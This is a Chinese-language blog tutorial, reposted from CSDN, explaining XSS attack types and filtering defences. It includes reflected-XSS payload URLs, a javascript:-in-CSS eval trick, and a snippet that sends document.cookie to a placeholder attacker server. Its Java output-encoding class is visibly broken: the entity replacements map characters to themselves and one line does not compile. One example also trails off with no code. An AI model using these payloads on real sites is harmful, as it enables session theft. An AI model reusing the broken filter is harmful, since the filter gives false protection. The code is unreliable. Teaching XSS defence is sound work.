xss攻击原理与解决方法
概述
XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列 表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。
攻击的条件
实施XSS攻击需要具备两个条件:
一、需要向web页面注入恶意代码;
二、这些恶意代码能够被浏览器成功的执行。
看一下下面这个例子:
<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"
code="var a = document.createElement('a');
a.innerHTML= '执行了恶意代码';document.body.appendChild(a);
//这这里执行代码
"></div>
这段代码在旧版的IE8和IE8以下的版本都是可以被执行的,火狐也能执行代码,但火狐对其禁止访问DOM对象,所以在火狐下执行将会看到控制里抛出异常:document is not defined (document是没有定义的)。
再来看一下面这段代码:
<div>
<img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />
</div>
相信很多程序员都觉得这个代码很正常,其实这个代码就存在一个反射型的XSS攻击,假如输入下面的地址:
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x=" 最终反射出来的HTML代码: <div> <img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" /> </div>
也许您会觉得把ValidateRequest设置为true或者保持默认值就能高枕无忧了,其实这种情况还可以输入下面的地址达到相同的攻击效果:
http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="
根据XSS攻击的效果可以分为几种类型
第一、XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。
第二、XSS存储型攻击,恶意代码被保存到目标网站的服务器中,这种攻击具有较强的稳定性和持久性,比较常见场景是在博客,论坛等社交网站上,但OA系统,和CRM系统上也能看到它身影,比如:某CRM系统的客户投诉功能上存在XSS存储型漏洞,黑客提交了恶意攻击代码,当系统管理员查看投诉信息时恶意代码执行,窃取了客户的资料,然而管理员毫不知情,这就是典型的XSS存储型攻击。
XSS攻击能做些什么
1.窃取cookies,读取目标网站的cookie发送到黑客的服务器上,如下面的代码:
var i=document.createElement("img")
document.body.appendChild(i)
i.src = "http://www.hackerserver.com/?c=" + document.cookie
2.读取用户未公开的资料,如果:邮件列表或者内容、系统的客户资料,联系人列表等等,如代码:
解决方法
一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码
1 import java.net.URLEncoder; 2 3 /** 4 * 过滤非法字符工具类 5 * 6 */ 7 public class EncodeFilter { 8 9 10 public static String encode(String input) { 11 if (input == null) { 12 return input; 13 } 14 StringBuilder sb = new StringBuilder(input.length()); 15 for (int i = 0, c = input.length(); i < c; i++) { 16 char ch = input.charAt(i); 17 switch (ch) { 18 case '&': sb.append("&"); 19 break; 20 case '<': sb.append("<"); 21 break; 22 case '>': sb.append(">"); 23 break; 24 case '"': sb.append("""); 25 break; 26 case '\'': sb.append("'"); 27 break; 28 case '/': sb.append("/"); 29 break; 30 default: sb.append(ch); 31 } 32 } 33 return sb.toString(); 34 } 35 36 37 public static String encodeForJS(String input) { 38 if (input == null) { 39 return input; 40 } 41 42 StringBuilder sb = new StringBuilder(input.length()); 43 44 for (int i = 0, c = input.length(); i < c; i++) { 45 char ch = input.charAt(i); 46 47 48 if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' || 49 ch >= '0' && ch <= '9' || 50 ch == ',' || ch == '.' || ch == '_') { 51 sb.append(ch); 52 } else { 53 String temp = Integer.toHexString(ch); 54 55 56 if (ch < 256) { 57 sb.append('\\').append('x'); 58 if (temp.length() == 1) { 59 sb.append('0'); 60 } 61 sb.append(temp.toLowerCase()); 62 63 64 } else { 65 sb.append('\\').append('u'); 66 for (int j = 0, d = 4 - temp.length(); j < d; j ++) { 67 sb.append('0'); 68 } 69 sb.append(temp.toUpperCase()); 70 } 71 } 72 } 73 74 return sb.toString(); 75 } 76 77 /** 78 * css非法字符过滤 79 * http://www.w3.org/TR/CSS21/syndata.html#escaped-characters 80 */ 81 public static String encodeForCSS(String input) { 82 if (input == null) { 83 return input; 84 } 85 86 StringBuilder sb = new StringBuilder(input.length()); 87 88 for (int i = 0, c = input.length(); i < c; i++) { 89 char ch = input.charAt(i); 90 91 92 if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' || 93 ch >= '0' && ch <= '9') { 94 sb.append(ch); 95 } else { 96 97 sb.append('\\').append(Integer.toHexString(ch)).append(' '); 98 } 99 } 100 return sb.toString(); 101 } 102 103 /** 104 * URL参数编码 105 * http://en.wikipedia.org/wiki/Percent-encoding 106 */ 107 public static String encodeURIComponent(String input) { 108 return encodeURIComponent(input, "utf-8"); 109 } 110 111 public static String encodeURIComponent(String input, String encoding) { 112 if (input == null) { 113 return input; 114 } 115 String result; 116 try { 117 result = URLEncoder.encode(input, encoding); 118 } catch (Exception e) { 119 result = ""; 120 } 121 return result; 122 } 123 124 public static boolean isValidURL(String input) { 125 if (input == null || input.length() < 8) { 126 return false; 127 } 128 char ch0 = input.charAt(0); 129 if (ch0 == 'h') { 130 if (input.charAt(1) == 't' && 131 input.charAt(2) == 't' && 132 input.charAt(3) == 'p') { 133 char ch4 = input.charAt(4); 134 if (ch4 == ':') { 135 if (input.charAt(5) == '/' && 136 input.charAt(6) == '/') { 137 138 return isValidURLChar(input, 7); 139 } else { 140 return false; 141 } 142 } else if (ch4 == 's') { 143 if (input.charAt(5) == ':' && 144 input.charAt(6) == '/' && 145 input.charAt(7) == '/') { 146 147 return isValidURLChar(input, 8); 148 } else { 149 return false; 150 } 151 } else { 152 return false; 153 } 154 } else { 155 return false; 156 } 157 158 } else if (ch0 == 'f') { 159 if( input.charAt(1) == 't' && 160 input.charAt(2) == 'p' && 161 input.charAt(3) == ':' && 162 input.charAt(4) == '/' && 163 input.charAt(5) == '/') { 164 165 return isValidURLChar(input, 6); 166 } else { 167 return false; 168 } 169 } 170 return false; 171 } 172 173 static boolean isValidURLChar(String url, int start) { 174 for (int i = start, c = url.length(); i < c; i ++) { 175 char ch = url.charAt(i); 176 if (ch == '"' || ch == '\'') { 177 return false; 178 } 179 } 180 return true; 181 } 182 183 }
二、 过滤用户输入的 检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。、严格控制输出
可以利用下面这些函数对出现xss漏洞的参数进行过滤 1、htmlspecialchars() 函数,用于转义处理在页面上显示的文本。 2、htmlentities() 函数,用于转义处理在页面上显示的文本。 3、strip_tags() 函数,过滤掉输入、输出里面的恶意标签。 4、header() 函数,使用header("Content-type:application/json"); 用于控制 json 数据的头部,不用于浏览。 5、urlencode() 函数,用于输出处理字符型参数带入页面链接中。 6、intval() 函数用于处理数值型参数输出页面中。 7、自定义函数,在大多情况下,要使用一些常用的 html 标签,以美化页面显示,如留言、小纸条。那么在这样的情况下,要采用白名单的方法使用合法的标签显示,过滤掉非法的字符。 各语言示例: PHP的htmlentities()或是htmlspecialchars()。 Python的cgi.escape()。 ASP的Server.HTMLEncode()。 ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library Java的xssprotect(Open Source Library)。 Node.js的node-validator。
原文:https://blog.csdn.net/qq_21956483/article/details/54377947
